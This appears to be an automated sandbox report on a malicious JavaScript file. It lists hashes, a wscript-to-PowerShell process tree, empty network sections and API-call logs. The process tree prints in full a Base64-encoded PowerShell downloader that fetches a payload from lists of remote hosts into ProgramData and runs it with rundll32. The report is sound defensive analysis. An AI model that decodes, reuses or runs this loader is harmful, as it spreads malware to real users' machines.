Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 23, 2023, 9:37 a.m.	May 23, 2023, 9:39 a.m.

Size	113.5KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`87bf8261360a2e4e9ba5941507cd03b5`
SHA256	`30ee8e640023ff20c340ed0a974c25c436fa47b90521e6129e84bcbff7302c79`
CRC32	`9DA074EB`
ssdeep	`1536:pz3TaarwxCbb3+hj8xa2hHdY04Ao53h2Sct9Hd/0rEOnsqYDbdwySOljG:BaMPOy4Ao5R2SSHd/0rEOnsqYDbS9OG`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Inkmp.js
840
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\dedicative.js" Trochees Superscript melanthiumSarcoderma stitchedWhangam
  2104
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABjAGEAcABzAGkAYwB1AG0AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQAYwBBAE8AUQBBAHUAQQBEAEkAQQBNAGcAQQAzAEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAGcAQQAzAEEAQwA0AEEATgB3AEEAegBBAEMANABBAE4AdwBBAHcAQQBDADQAQQBPAEEAQQAwAEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEkAQQBMAGcAQQB5AEEARABFAEEATgBnAEEAdQBBAEQARQBBAE4AQQBBADEAQQBDADQAQQBNAFEAQQA1AEEARABjAEEAIgA7ACQAVAB1AGIAZgBpAHMAaABlAHMAUwBsAHUAbQBwAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAYwBBAGMAZwBCAGgAQQBHADQAQQBkAFEAQgBzAEEARwA4AEEAWQB3AEIANQBBAEgAUQBBAGIAdwBCAHcAQQBHADgAQQBhAFEAQgBsAEEASABNAEEAYQBRAEIAegBBAEMANABBAFoAUQBCAHUAQQBIAFEAQQBaAFEAQgB5AEEASABBAEEAYwBnAEIAcABBAEgATQBBAFoAUQBCAHoAQQBBAD0APQBGAE8AdwBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCAHAAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAWgBnAEIAbABBAEgASQBBAFoAUQBCAHUAQQBHAE0AQQBaAFEAQgBRAEEASABJAEEAYgB3AEIAdwBBAEcAOABBAFoAQQBCAHAAQQBHAEUAQQBiAEEAQgBsAEEAQwA0AEEAWgBBAEIAbABBAEEAPQA9ACIAOwAkAEwAbwB3AGIAcgBlAGQARAB5AHMAawBpAG4AZQBzAGkAYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGMAZwBCAHYAQQBHAHcAQQBiAEEAQgBsAEEASABrAEEAWQBnAEIAMQBBAEgATQBBAEwAZwBCAGoAQQBHAEUAQQBjAHcAQgBvAEEAQQA9AD0ATgBvAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AZwBBAHcAQQBEAFUAQQBMAGcAQQA1AEEARABNAEEATABnAEEAeABBAEQAQQBBAE8AUQBBAD0ATgBvAEwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQB3AEEAdQBBAEQARQBBAE8AQQBBADUAQQBDADQAQQBOAEEAQQA1AEEAQwA0AEEATQBnAEEAegBBAEQASQBBAE4AbwBMAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAbwBBAGIAdwBCADUAQQBIAGMAQQBaAFEAQgBsAEEARwBRAEEATABnAEIAMABBAEcAOABBAGQAdwBCAHUAQQBBAD0APQAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAyADsAJABVAG4AdABhAHgAaQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAE0AQQBHAGsAQQBiAGcAQgBuAEEARwBFAEEAYgBBAEIAaABBAEMANABBAGQAZwBCAGoAQQBBAD0APQBZAGwAcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAFEAQQB3AEEARABJAEEAWQBsAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAwAEEARwBFAEEAYgBBAEIAdgBBAEcATQBBAFkAUQBCAHMAQQBHAE0AQQBZAFEAQgB1AEEARwBVAEEAWQBRAEIAdQBBAEMANABBAGQAZwBCAHYAQQBIAGsAQQBZAFEAQgBuAEEARwBVAEEAWQBsAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAEUAQQBMAGcAQQAyAEEARABZAEEATABnAEEAMgBBAEQASQBBACIAOwAkAFAAcgBpAG0AaQB0AGkAYQBlAFMAYwByAHUAdABvACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEATgBnAEEAMgBBAEQAUQBBAGIAdwBBADIAQQBIAEUAQQBkAGcAQgBqAEEARwBVAEEAYQBnAEEAPQBTAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE4AdwBBADUAQQBDADgAQQBVAEEAQgBzAEEARQB3AEEATgBBAEIAdABBAEYAVQBBAEwAdwBCAHAAQQBIAEUAQQBSAHcAQgBNAEEARABjAEEAUwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAVQBBAEIASwBBAEcAbwBBAFIAZwBBADMAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABTAGwAYQB2AG8AYwByAGEAdABpAGMAQwBvAG4AZgBlAHMAcwBlAHMAIABpAG4AIAAkAFAAcgBpAG0AaQB0AGkAYQBlAFMAYwByAHUAdABvACAALQBzAHAAbABpAHQAIAAiAFMAIgApACAAewAkAEYAbAB1AHMAaABpAG4AZwBsAHkARQBwAGkAegBvAGEAcgBpAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAOABBAFoAQQBCAG0AQQBIAFUAQQBiAEEAQgBFAEEARwBVAEEAYwBBAEIAbABBAEcANABBAFoAQQBCAGgAQQBHADQAQQBkAEEAQgBzAEEASABrAEEATABnAEIAegBBAEcAZwBBAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBnAEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBOAHcAQQB5AEEAQwA0AEEATQBRAEEAdwBBAEQAUQBBAFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwA4AEEAWQBnAEIAcwBBAEcAawBBAGQAQQBCAGwAQQBIAEkAQQBZAFEAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEgATQBBAFYAUQBCADIAQQBHAEUAQQBjAGcAQgB2AEEASABZAEEAYQBRAEIAMABBAEcAVQBBAEwAZwBCAGoAQQBIAEkAQQBaAFEAQgBrAEEARwBrAEEAZABBAEIAagBBAEcARQBBAGMAZwBCAGsAQQBBAD0APQAiADsAdAByAHkAIAB7ACQATABvAG8AZgBhAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBNAFEAQQB1AEEARABFAEEATQBBAEEAMwBBAEMANABBAE0AUQBBADMAQQBEAGMAQQBMAGcAQQAxAEEARABNAEEAVgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBrAEEARwBVAEEAYwBnAEIAegBBAEgAQQBBAGIAQQBCAHAAQQBHAE0AQQBhAFEAQgB1AEEARwBjAEEATABnAEIAegBBAEcARQBBAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABBAEEATABnAEEAMABBAEQAUQBBAEwAZwBBAHgAQQBEAGsAQQBOAFEAQQB1AEEARABFAEEATQBRAEEAMgBBAEEAPQA9AFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBBAEIAcwBBAEcAOABBAGQAQQBCAHkAQQBHADgAQQBjAEEAQgBsAEEASABNAEEATABnAEIAbABBAEcAMABBAFkAUQBCAHAAQQBHAHcAQQAiADsAJABLAGUAZQBuAGkAbgBnAFQAaABlAG8AcABoAGEAZwB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBFAEEARwBFAEEAYgBBAEIAagBBAEcARQBBAGMAdwBCAHoAQQBHAGsAQQBZAFEAQgB1AEEARgBVAEEAYgBnAEIAegBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAMABBAEgAawBBAEwAZwBCAHoAQQBHAFUAQQBlAEEAQgA1AEEAQQA9AD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAFEAQQBhAFEAQgAyAEEARwBVAEEAYwBnAEIAbgBBAEcAVQBBAGIAZwBCAGoAQQBHAFUAQQBjAHcAQgBCAEEARwB3AEEAWQBRAEIAeQBBAEcAMABBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEASABjAEEAWgBRAEIAaQBBAEgATQBBAGEAUQBCADAAQQBHAFUAQQBJAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGEAQQBCAHYAQQBIAFEAQQBiAHcAQgB1AEEARwBVAEEAWgB3AEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgB6AEEARwA4AEEAYgBBAEIAaABBAEgASQBBAEkAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBpAEEARwBFAEEAYgBBAEIAaABBAEcANABBAGIAdwBCAHcAQQBHAGcAQQBiAHcAQgB5AEEARwBrAEEAYgBnAEEAdQBBAEgAYwBBAGEAUQBCAHIAQQBHAGsAQQAiADsAJABvAHUAdABjAG8AbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFMAbABhAHYAbwBjAHIAYQB0AGkAYwBDAG8AbgBmAGUAcwBzAGUAcwApACkAOwB3AGcAZQB0ACAAJABvAHUAdABjAG8AbQBlACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGEAZQBjAGkAZABpAHUAbQAuAEEAdAB0AGUAbgB1AGEAdABvAHIAOwAkAGYAaQBnAGUAYQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAFEAQQB1AEEARABFAEEATwBBAEEAMgBBAEMANABBAE0AUQBBAHgAQQBEAEkAQQAiADsAJABWAGUAcgBuAGEAbABpAHQAeQBNAGkAYwByAG8AcABoAG8AbgBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBNAEEAQQB1AEEARABFAEEATwBRAEEAeQBBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABBAEEAbwBaAFQAawBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAHcAQQBZAFEAQgB3AEEARwBJAEEAYgB3AEIAaABBAEgASQBBAFoAQQBCAEUAQQBHADgAQQBkAHcAQgB1AEEARwBZAEEAWQBRAEIAagBBAEcAVQBBAEwAZwBCAHoAQQBHAFUAQQBvAFoAVABrAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB0AEEASABBAEEAYgBBAEIAbABBAEcAUQBBAEwAZwBCADUAQQBHADgAQQBhAHcAQgB2AEEARwBnAEEAWQBRAEIAdABBAEcARQBBACIAOwAkAHIAYQBqAGUAcwBoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAFkAQQBMAGcAQQB4AEEARABZAEEATQB3AEEAdQBBAEQAawBBAE0AdwBBAD0APQB1AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdQBBAEcAOABBAGIAZwBCAHUAQQBHAFUAQQBjAGcAQgAyAEEARwA4AEEAZABRAEIAegBBAEcAdwBBAGUAUQBCAFEAQQBIAEkAQQBaAFEAQgBrAEEARwBrAEEAZABnAEIAcABBAEcANABBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEASABRAEEAYQBRAEIAbABBAEcANABBAFoAQQBCAGgAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABhAGUAYwBpAGQAaQB1AG0ALgBBAHQAdABlAG4AdQBhAHQAbwByACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA2ADUANAAwADUAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAEUAQQBaAFEAQgBqAEEARwBrAEEAWgBBAEIAcABBAEgAVQBBAGIAUQBBAHUAQQBFAEUAQQBkAEEAQgAwAEEARwBVAEEAYgBnAEIAMQBBAEcARQBBAGQAQQBCAHYAQQBIAEkAQQBMAEEAQgAyAEEARwBrAEEAYwBBAEIAegBBAEQAcwBBAGMAdwBCAHMAQQBHAEUAQQBZAHcAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBACIAOwAkAEUAYQBzAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwB3AEEAYgBBAEIAaABBAEcAMABBAGIAdwBCADAAQQBIAFEAQQBhAFEAQQB1AEEARwBNAEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCADAAQQBBAD0APQBrAHIAVABFAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAOABBAGMAZwBCAHkAQQBIAFUAQQBjAEEAQgAwAEEARwB3AEEAWgBRAEIAegBBAEgATQBBAEwAZwBCAGgAQQBIAFUAQQBZAHcAQgAwAEEARwBrAEEAYgB3AEIAdQBBAEEAPQA9AGsAcgBUAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAE0AQQBaAFEAQgBzAEEARwBFAEEAWQBnAEIAcwBBAEcAVQBBAEwAZwBCAHkAQQBHAFUAQQBhAFEAQgB6AEEARwBVAEEAawByAFQARQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEUAQQBHAGsAQQBjAHcAQgBsAEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCAGwAQQBHAFEAQQBMAGcAQgBoAEEARwB3AEEAYwB3AEIAaABBAEcATQBBAFoAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAGEAbgBzAGEAcgBUAGEAcgByAHkAaQBuAGcAbAB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAegBBAEMANABBAE0AUQBBAHoAQQBEAFEAQQBMAGcAQQB4AEEARABjAEEATgBBAEEAdQBBAEQASQBBAE4AQQBBADQAQQBBAD0APQBVAEIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABZAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEUAQQBOAEEAQQAwAEEAQwA0AEEATQBRAEEAegBBAEQARQBBAFUAQgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBNAFEAQQB1AEEARABFAEEATQBRAEEAMwBBAEEAPQA9AFUAQgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATQBnAEEAeQBBAEMANABBAE0AZwBBAHgAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATgB3AEEAPQAiADsAJABNAGkAeAB0AGkAbABpAG4AZQBhAHIARQBuAGQAYQBuAGcAZQBpAHQAaQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBjAEEAYwBnAEIAaABBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBRAHcAQgAxAEEARwB3AEEAYgBRAEIAbABBAEcAUQBBAEwAZwBCAHoAQQBIAFUAQQBjAEEAQgB3AEEARwA4AEEAYwBnAEIAMABBAEEAPQA9AGMAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABBAEEATABnAEEAMABBAEQAVQBBAEwAZwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABjAEEATgB3AEEAPQBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAUQBBAGUAUQBCAHcAQQBHAFUAQQBaAGcAQgB2AEEASABJAEEAYgBRAEEAdQBBAEcASQBBAFkAUQBCAHkAQQBHAGMAQQBZAFEAQgBwAEEARwA0AEEAYwB3AEEAPQAiADsAfQB9ACQAcwB3AGUAZQB0AGkAZQB3AGkAZgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBHAEEARwBFAEEAYgBBAEIAegBBAEcAawBBAFoAZwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAHoAQQBBAD0APQAiADsA"
    2264

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 23, 2023, 9:37 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 23, 2023, 9:37 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb580 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebb40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebb40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebb40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebb40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebb40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebb40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebdc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebdc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebdc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eb740 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebdc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebdc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebdc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebdc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebdc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebdc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebdc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ebfc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eba40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eba40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eba40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 23, 2023, 9:37 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006eba40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
